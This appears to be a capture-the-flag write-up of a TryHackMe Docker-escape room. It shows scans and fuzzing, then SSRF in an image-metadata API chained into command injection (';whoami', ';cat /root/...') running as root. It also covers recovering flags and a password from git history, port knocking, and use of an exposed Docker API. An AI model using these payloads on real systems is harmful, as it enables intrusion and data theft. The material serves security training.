The Great Escape

Our devs have created an awesome new site. Can you break out of the sandbox?

Introduction

Start Machine

If you're Stuck with the Docker Breakout part of this challenge, use the "Docker Rodeo" room to learn a wide variety of Docker vulnerabilities.

Answer the questions below

Deploy the VM

Question Done

A Simple Webapp

Start off with a simple webapp. Can you find the hidden flag?

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.141.57 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.141.57:22
Open 10.10.141.57:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 13:40 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:40
Completed NSE at 13:40, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:40
Completed Parallel DNS resolution of 1 host. at 13:40, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:40
Scanning 10.10.141.57 [2 ports]
Discovered open port 80/tcp on 10.10.141.57
Discovered open port 22/tcp on 10.10.141.57
Completed Connect Scan at 13:40, 0.20s elapsed (2 total ports)
Initiating Service scan at 13:40
Scanning 2 services on 10.10.141.57
Completed Service scan at 13:43, 162.02s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.141.57.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 26.01s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 2.98s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
Nmap scan report for 10.10.141.57
Host is up, received user-set (0.20s latency).
Scanned at 2023-04-07 13:40:17 EDT for 192s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh?    syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    syn-ack nginx 1.19.6
|_http-title: docker-escape-nuxt
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.93%I=7%D=4/7%Time=6430558D%P=x86_64-pc-linux-gnu%r(Gener
SF:icLines,4,"IR\r\n");

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:43
Completed NSE at 13:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.99 seconds

┌──(witty㉿kali)-[/tmp]
└─$ feroxbuster -u http://10.10.141.57/api/ -w /usr/share/wordlists/dirb/common.txt -k -t 64 -x php -s 200

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.7.3
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.10.141.57/api/
 🚀  Threads               │ 64
 📖  Wordlist              │ /usr/share/wordlists/dirb/common.txt
 👌  Status Codes          │ [200]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.7.3
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 💲  Extensions            │ [php]
 🏁  HTTP methods          │ [GET]
 🔓  Insecure              │ true
 🔃  Recursion Depth       │ 4
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
[####################] - 30s     9228/9228    0s      found:0       errors:0 

http://10.10.141.57/.well-known/security.txt

Hey you found me!

The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.

See https://securitytxt.org/ for more information.

Ping /api/fl46 with a HEAD request for a nifty treat.

┌──(witty㉿kali)-[/tmp]
└─$ curl -I http://10.10.141.57/api/fl46                                                   
HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Fri, 07 Apr 2023 18:18:01 GMT
Connection: keep-alive
flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

The "curl -I" command is used to send a HEAD request to a web server and retrieve only the headers of the HTTP response, without the body. This can be useful for checking the response headers, such as the status code, content type, and caching information, without downloading the entire response.

HEAD /api/fl46 HTTP/1.1

HTTP/1.1 200 OK

Server: nginx/1.19.6

Date: Fri, 07 Apr 2023 18:20:54 GMT

Connection: close

flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}

Find the flag hidden in the webapp

Some well known files may offer some help

THM{b801135794bf1ed3a2aafaa44c2e5ad4}

Root! Root?

There's a flag hidden by root on one of the machines. Can you find it?

Answer the questions below

http://10.10.141.57/exif-util/

uploading an img

        EXIF:
----------------------
[JPEG] Compression Type - Baseline
[JPEG] Data Precision - 8 bits
[JPEG] Image Height - 533 pixels
[JPEG] Image Width - 800 pixels
[JPEG] Number of Components - 3
[JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert
[JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JFIF] Version - 1.1
[JFIF] Resolution Units - none
[JFIF] X Resolution - 1 dot
[JFIF] Y Resolution - 1 dot
[JFIF] Thumbnail Width Pixels - 0
[JFIF] Thumbnail Height Pixels - 0
[ICC Profile] Profile Size - 524
[ICC Profile] CMM Type - lcms
[ICC Profile] Version - 2.1.0
[ICC Profile] Class - Display Device
[ICC Profile] Color space - RGB 
[ICC Profile] Profile Connection Space - XYZ 
[ICC Profile] Profile Date/Time - 2012:01:25 03:41:57
[ICC Profile] Signature - acsp
[ICC Profile] Primary Platform - Apple Computer, Inc.
[ICC Profile] XYZ values - 0.964 1 0.825
[ICC Profile] Tag Count - 10
[ICC Profile] Profile Description - c2
[ICC Profile] Profile Copyright - FB
[ICC Profile] Media White Point - (0.9642, 1, 0.8249)
[ICC Profile] Media Black Point - (0.0121, 0.0125, 0.0103)
[ICC Profile] Red Colorant - (0.4361, 0.2225, 0.0139)
[ICC Profile] Green Colorant - (0.3851, 0.7169, 0.0971)
[ICC Profile] Blue Colorant - (0.1431, 0.0606, 0.7141)
[ICC Profile] Red TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0
[ICC Profile] Green TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0
[ICC Profile] Blue TRC - 0.0, 0.0030976, 0.0069734, 0.0132296, 0.0217594, 0.0328832, 0.0467231, 0.0634623, 0.0832685, 0.1062638, 0.1325856, 0.162356, 0.1956817, 0.2327001, 0.273518, 0.3182269, 0.3669032, 0.4196841, 0.4766461, 0.5378653, 0.6034638, 0.6734874, 0.7480125, 0.8272068, 0.9109026, 1.0
[Huffman] Number of Tables - 4 Huffman tables
[File Type] Detected File Type Name - JPEG
[File Type] Detected File Type Long Name - Joint Photographic Experts Group
[File Type] Detected MIME Type - image/jpeg
[File Type] Expected File Name Extension - jpg
[File] File Name - pfx4603328967788719562sfx
[File] File Size - 42663 bytes
[File] File Modified Date - Fri Apr 07 18:28:02 +00:00 2023

XMP:
----------------------

using url

┌──(witty㉿kali)-[~/Downloads]
└─$ file filekoth 
filekoth: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1350x900, components 3


┌──(witty㉿kali)-[~/Downloads]
└─$ python3 -m http.server 1234       
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
10.10.141.57 - - [07/Apr/2023 14:31:13] "GET /filekoth HTTP/1.1" 200 -

http://10.8.19.103:1234/filekoth

        EXIF:
----------------------
[JPEG] Compression Type - Baseline
[JPEG] Data Precision - 8 bits
[JPEG] Image Height - 900 pixels
[JPEG] Image Width - 1350 pixels
[JPEG] Number of Components - 3
[JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert
[JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JFIF] Version - 1.1
[JFIF] Resolution Units - inch
[JFIF] X Resolution - 72 dots
[JFIF] Y Resolution - 72 dots
[JFIF] Thumbnail Width Pixels - 0
[JFIF] Thumbnail Height Pixels - 0
[Huffman] Number of Tables - 4 Huffman tables
[File Type] Detected File Type Name - JPEG
[File Type] Detected File Type Long Name - Joint Photographic Experts Group
[File Type] Detected MIME Type - image/jpeg
[File Type] Expected File Name Extension - jpg

XMP:
----------------------

GET /api/exif?url=http:%2F%2F10.8.19.103:1234%2Ffilekoth HTTP/1.1

SSRF

HTTP/1.1 200 OK

Server: nginx/1.19.6

Date: Fri, 07 Apr 2023 18:31:15 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 925

Connection: close



EXIF:
----------------------
[JPEG] Compression Type - Baseline
[JPEG] Data Precision - 8 bits
[JPEG] Image Height - 900 pixels
[JPEG] Image Width - 1350 pixels
[JPEG] Number of Components - 3
[JPEG] Component 1 - Y component: Quantization table 0, Sampling factors 2 horiz/2 vert
[JPEG] Component 2 - Cb component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JPEG] Component 3 - Cr component: Quantization table 1, Sampling factors 1 horiz/1 vert
[JFIF] Version - 1.1
[JFIF] Resolution Units - inch
[JFIF] X Resolution - 72 dots
[JFIF] Y Resolution - 72 dots
[JFIF] Thumbnail Width Pixels - 0
[JFIF] Thumbnail Height Pixels - 0
[Huffman] Number of Tables - 4 Huffman tables
[File Type] Detected File Type Name - JPEG
[File Type] Detected File Type Long Name - Joint Photographic Experts Group
[File Type] Detected MIME Type - image/jpeg
[File Type] Expected File Name Extension - jpg

XMP:
----------------------

send to repeater

GET /api/exif?url=http://127.0.0.1:8080 HTTP/1.1

HTTP/1.1 200 OK

Server: nginx/1.19.6

Date: Fri, 07 Apr 2023 18:39:24 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 342

Connection: close



An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Nothing to see here</title>
</head>
<body>

<p>Nothing to see here, move along...</p>

</body>
</html>

trying with port 22,80 and 8080

creating a wordlist to get /*.bak.txt$

┌──(witty㉿kali)-[~/Downloads]
└─$ cewl http://10.10.85.253 -d 5 -o           
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
docker
escape
nuxt
Loading

uhmm manually

┌──(witty㉿kali)-[/tmp]
└─$ nano wordlist-man
                                                                                                 
┌──(witty㉿kali)-[/tmp]
└─$ cat wordlist-man 
login
users
user
photo
image
sign-up
signup
Signup
SignUp
test
courses
username
user
admin
photos
images
exif-util
classroom
class
course
photos

┌──(witty㉿kali)-[/tmp]
└─$ wfuzz -u http://10.10.85.253/FUZZ.bak.txt -w /tmp/wordlist-man --hc 404,503 --hh 3834
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.85.253/FUZZ.bak.txt
Total requests: 21

=====================================================================
ID           Response   Lines    Word       Chars       Payload                         
=====================================================================

000000017:   200        64 L     125 W      1479 Ch     "exif-util"                     

Total time: 9.437551
Processed Requests: 21
Filtered Requests: 20
Requests/sec.: 2.225153

http://10.10.85.253/exif-util.bak.txt

<template>
  <section>
    <div class="container">
      <h1 class="title">Exif Utils</h1>
      <section>
        <form @submit.prevent="submitUrl" name="submitUrl">
          <b-field grouped label="Enter a URL to an image">
            <b-input
              placeholder="http://..."
              expanded
              v-model="url"
            ></b-input>
            <b-button native-type="submit" type="is-dark">
              Submit
            </b-button>
          </b-field>
        </form>
      </section>
      <section v-if="hasResponse">
        <pre>
          {{ response }}
        </pre>
      </section>
    </div>
  </section>
</template>

<script>
export default {
  name: 'Exif Util',
  auth: false,
  data() {
    return {
      hasResponse: false,
      response: '',
      url: '',
    }
  },
  methods: {
    async submitUrl() {
      this.hasResponse = false
      console.log('Submitted URL')
      try {
        const response = await this.$axios.$get('http://api-dev-backup:8080/exif', {
          params: {
            url: this.url,
          },
        })
        this.hasResponse = true
        this.response = response
      } catch (err) {
        console.log(err)
        this.$buefy.notification.open({
          duration: 4000,
          message: 'Something bad happened, please verify that the URL is valid',
          type: 'is-danger',
          position: 'is-top',
          hasIcon: true,
        })
      }
    },
  },
}
</script>

GET /api/exif?url=http://api-dev-backup:8080/exif HTTP/1.1

Server: nginx/1.19.6

Date: Fri, 07 Apr 2023 20:04:19 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 3287

Connection: close



An error occurred: HTTP Exception 500 Internal Server Error
                Response was:
                ---------------------------------------
                <-- 500 http://api-dev-backup:8080/exif
Response : Internal Server Error

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;whoami HTTP/1.1

HTTP/1.1 200 OK

Server: nginx/1.19.6

Date: Fri, 07 Apr 2023 20:06:26 GMT

Content-Type: text/plain;charset=UTF-8

Content-Length: 414

Connection: close



An error occurred: File format could not be determined
                Retrieved Content
                ----------------------------------------
                An error occurred: File format could not be determined
               Retrieved Content
               ----------------------------------------
               curl: no URL specified!
curl: try 'curl --help' or 'curl --manual' for more information
root

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;id HTTP/1.1

uid=0(root) gid=0(root) groups=0(root)

cannot get a revshell doing manually 

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;ls+-lah+/root HTTP/1.1

total 28K
drwx------ 1 root root 4.0K Jan  7  2021 .
drwxr-xr-x 1 root root 4.0K Jan  7  2021 ..
lrwxrwxrwx 1 root root    9 Jan  6  2021 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 1 root root 4.0K Jan  7  2021 .git
-rw-r--r-- 1 root root   53 Jan  6  2021 .gitconfig
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rw-rw-r-- 1 root root  201 Jan  7  2021 dev-note.txt

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/dev-note.txt HTTP/1.1

Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123

Cheers,

Hydra

┌──(witty㉿kali)-[~/Downloads]
└─$ ssh hydra@10.10.85.253 -v
OpenSSH_9.2p1 Debian-2, OpenSSL 3.0.8 7 Feb 2023
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: include /etc/ssh/ssh_config.d/*.conf matched no files
debug1: /etc/ssh/ssh_config line 21: Applying options for *
debug1: Connecting to 10.10.85.253 [10.10.85.253] port 22.
debug1: Connection established.
debug1: identity file /home/witty/.ssh/id_rsa type 0
debug1: identity file /home/witty/.ssh/id_rsa-cert type -1
debug1: identity file /home/witty/.ssh/id_ecdsa type -1
debug1: identity file /home/witty/.ssh/id_ecdsa-cert type -1
debug1: identity file /home/witty/.ssh/id_ecdsa_sk type -1
debug1: identity file /home/witty/.ssh/id_ecdsa_sk-cert type -1
debug1: identity file /home/witty/.ssh/id_ed25519 type -1
debug1: identity file /home/witty/.ssh/id_ed25519-cert type -1
debug1: identity file /home/witty/.ssh/id_ed25519_sk type -1
debug1: identity file /home/witty/.ssh/id_ed25519_sk-cert type -1
debug1: identity file /home/witty/.ssh/id_xmss type -1
debug1: identity file /home/witty/.ssh/id_xmss-cert type -1
debug1: identity file /home/witty/.ssh/id_dsa type -1
debug1: identity file /home/witty/.ssh/id_dsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_9.2p1 Debian-2
debug1: kex_exchange_identification: banner line 0:  heQiE7 ]:{F
debug1: kex_exchange_identification: banner line 1: {

uhmm

https://github.com/skeeto/endlessh

┌──(witty㉿kali)-[~/Downloads]
└─$ curl -v  http://10.10.85.253/api/login -d '{"username"\:"hydra","password"\:"fluffybunnies123"}'                                    
*   Trying 10.10.85.253:80...
* Connected to 10.10.85.253 (10.10.85.253) port 80 (#0)
> POST /api/login HTTP/1.1
> Host: 10.10.85.253
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Length: 52
> Content-Type: application/x-www-form-urlencoded
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 415 Unsupported Media Type
< Server: nginx/1.19.6
< Date: Fri, 07 Apr 2023 20:18:26 GMT
< Content-Length: 0
< Connection: keep-alive
< 
* Connection #0 to host 10.10.85.253 left intact

┌──(witty㉿kali)-[~/Downloads]
└─$ curl -v  http://10.10.85.253/api/login -d '{"username"\:"hydra","password"\:"fluffybunnies123"}' -H "Content-Type: application/json"
*   Trying 10.10.85.253:80...
* Connected to 10.10.85.253 (10.10.85.253) port 80 (#0)
> POST /api/login HTTP/1.1
> Host: 10.10.85.253
> User-Agent: curl/7.87.0
> Accept: */*
> Content-Type: application/json
> Content-Length: 52
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Server: nginx/1.19.6
< Date: Fri, 07 Apr 2023 20:18:57 GMT
< Content-Type: application/json
< Content-Length: 72
< Connection: keep-alive
< 
{
    "status": "ERROR",
    "message": "Invalid Username or Password"
* Connection #0 to host 10.10.85.253 left intact
}  

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+log HTTP/1.1

commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra <hydragyrum@example.com>
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+5242825dfd6b96819f65d17a1c31a99fea4ffb6a HTTP/1.1

Note: checking out '5242825dfd6b96819f65d17a1c31a99fea4ffb6a'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

  git checkout -b <new-branch-name>

HEAD is now at 5242825 fixed the dev note

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+4530ff7f56b215fa9fe76c4d7cc1319960c4e539 HTTP/1.1

Previous HEAD position was 5242825 fixed the dev note
HEAD is now at 4530ff7 Removed the flag and original dev note b/c Security

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cd+/root;git+checkout+a3d30a7d0510dc6565ff9316e3fb84434916dee8 HTTP/1.1

Previous HEAD position was 4530ff7 Removed the flag and original dev note b/c Security
HEAD is now at a3d30a7 Added the flag and dev notes

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/flag.txt HTTP/1.1

THM{0cb4b947043cb5c0486a454b75a10876}

GET /api/exif?url=http://api-dev-backup:8080/exif?url=;cat+/root/dev-note.txt HTTP/1.1

Hey guys,

I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.

Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.

Cheers,

Hydra

Find the root flag?

Silly devs leaving their backups lying around...

THM{0cb4b947043cb5c0486a454b75a10876}

The Great Escape

You thought you had root. But the root on a docker container isn't all that helpful. Find the secret flag

Answer the questions below

┌──(witty㉿kali)-[~/Downloads]
└─$ cat knock_port.sh
#! /bin/bash

curl http://10.10.85.253:42 -m 1
sleep 1
curl http://10.10.85.253:1337 -m 1
sleep 1
curl http://10.10.85.253:10420 -m 1
sleep 1
curl http://10.10.85.253:6969 -m 1
sleep 1
curl http://10.10.85.253:63000 -m 1

┌──(witty㉿kali)-[~/Downloads]
└─$ man curl | grep '\--max-time'
              See also -m, --max-time.
              See also -m, --max-time and --connect-timeout. Added in 7.59.0.
              See also --no-keepalive and -m, --max-time.
       -m, --max-time <fractional seconds>
              If -m, --max-time is provided several times, the last set value will be used.
               curl --max-time 10 https://example.com
               curl --max-time 2.92 https://example.com
              single request's maximum time, use -m, --max-time. Set this option  to  zero  to
              See also -y, --speed-time, --limit-rate and -m, --max-time.

┌──(witty㉿kali)-[~/Downloads]
└─$ bash knock_port.sh 
curl: (7) Failed to connect to 10.10.85.253 port 42 after 197 ms: Couldn't connect to server
curl: (7) Failed to connect to 10.10.85.253 port 1337 after 197 ms: Couldn't connect to server
curl: (7) Failed to connect to 10.10.85.253 port 10420 after 203 ms: Couldn't connect to server
curl: (7) Failed to connect to 10.10.85.253 port 6969 after 200 ms: Couldn't connect to server
curl: (7) Failed to connect to 10.10.85.253 port 63000 after 219 ms: Couldn't connect to server

┌──(witty㉿kali)-[~/Downloads]
└─$ rustscan -a 10.10.85.253 --ulimit 5500 -b 65535 -- -A -Pn
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/witty/.rustscan.toml"
[~] Automatically increasing ulimit value to 5500.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.85.253:22
Open 10.10.85.253:80
Open 10.10.85.253:2375
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 16:34 EDT
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:34
Completed NSE at 16:34, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:34
Completed Parallel DNS resolution of 1 host. at 16:34, 0.01s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 16:34
Scanning 10.10.85.253 [3 ports]
Discovered open port 80/tcp on 10.10.85.253
Discovered open port 22/tcp on 10.10.85.253
Discovered open port 2375/tcp on 10.10.85.253
Completed Connect Scan at 16:34, 0.20s elapsed (3 total ports)
Initiating Service scan at 16:34
Scanning 3 services on 10.10.85.253
Completed Service scan at 16:37, 162.04s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.85.253.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 26.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 3.01s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Nmap scan report for 10.10.85.253
Host is up, received user-set (0.19s latency).
Scanned at 2023-04-07 16:34:27 EDT for 192s

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh?    syn-ack
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| fingerprint-strings: 
|   GenericLines: 
|_    M|[nPeZ'A
80/tcp   open  http    syn-ack nginx 1.19.6
|_http-title: docker-escape-nuxt
|_http-server-header: nginx/1.19.6
|_http-favicon: Unknown favicon MD5: 67EDB7D39E1376FDD8A24B0C640D781E
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
| http-methods: 
|_  Supported Methods: GET HEAD
2375/tcp open  docker  syn-ack Docker 20.10.2 (API 1.41)
| docker-version: 
|   KernelVersion: 4.15.0-130-generic
|   ApiVersion: 1.41
|   Version: 20.10.2
|   MinAPIVersion: 1.12
|   Platform: 
|     Name: Docker Engine - Community
|   Os: linux
|   Arch: amd64
|   Components: 
|     
|       Details: 
|         KernelVersion: 4.15.0-130-generic
|         Experimental: false
|         MinAPIVersion: 1.12
|         GitCommit: 8891c58
|         GoVersion: go1.13.15
|         Arch: amd64
|         Os: linux
|         BuildTime: 2020-12-28T16:15:09.000000000+00:00
|         ApiVersion: 1.41
|       Name: Engine
|       Version: 20.10.2
|     
|       Details: 
|         GitCommit: 269548fa27e0089a8b8278fc4fc781d7f65a939b
|       Name: containerd
|       Version: 1.4.3
|     
|       Details: 
|         GitCommit: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
|       Name: runc
|       Version: 1.0.0-rc92
|     
|       Details: 
|         GitCommit: de40ad0
|       Name: docker-init
|       Version: 0.19.0
|   GoVersion: go1.13.15
|   BuildTime: 2020-12-28T16:15:09.000000000+00:00
|_  GitCommit: 8891c58
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.93%I=7%D=4/7%Time=64307E5F%P=x86_64-pc-linux-gnu%r(Gener
SF:icLines,B,"M\|\[nPeZ'A\r\n");
Service Info: OS: linux

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:37
Completed NSE at 16:37, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 196.91 seconds

┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 ps
CONTAINER ID   IMAGE          COMMAND                  CREATED       STATUS       PORTS                  NAMES
49fe455a9681   frontend       "/docker-entrypoint.…"   2 years ago   Up 2 hours   0.0.0.0:80->80/tcp     dockerescapecompose_frontend_1
4b51f5742aad   exif-api-dev   "./application -Dqua…"   2 years ago   Up 2 hours                          dockerescapecompose_api-dev-backup_1
cb83912607b9   exif-api       "./application -Dqua…"   2 years ago   Up 2 hours   8080/tcp               dockerescapecompose_api_1
548b701caa56   endlessh       "/endlessh -v"           2 years ago   Up 2 hours   0.0.0.0:22->2222/tcp   dockerescapecompose_endlessh_1

┌──(witty㉿kali)-[~/Downloads]
└─$ docker -H 10.10.85.253:2375 images
REPOSITORY                                    TAG       IMAGE ID       CREATED       SIZE
exif-api-dev                                  latest    4084cb55e1c7   2 years ago   214MB
exif-api                                      latest    923c5821b907   2 years ago   163MB
frontend                                      latest    577f9da1362e   2 years ago   138MB
endlessh                                      latest    7bde5182dc5e   2 years ago   5.67MB
nginx                                         latest    ae2feff98a0c   2 years ago   133MB
debian                                        10-slim   4a9cd57610d6   2 years ago   69.2MB
registry.access.redhat.com/ubi8/ubi-minimal   8.3       7331d26c1fdf   2 years ago   103MB
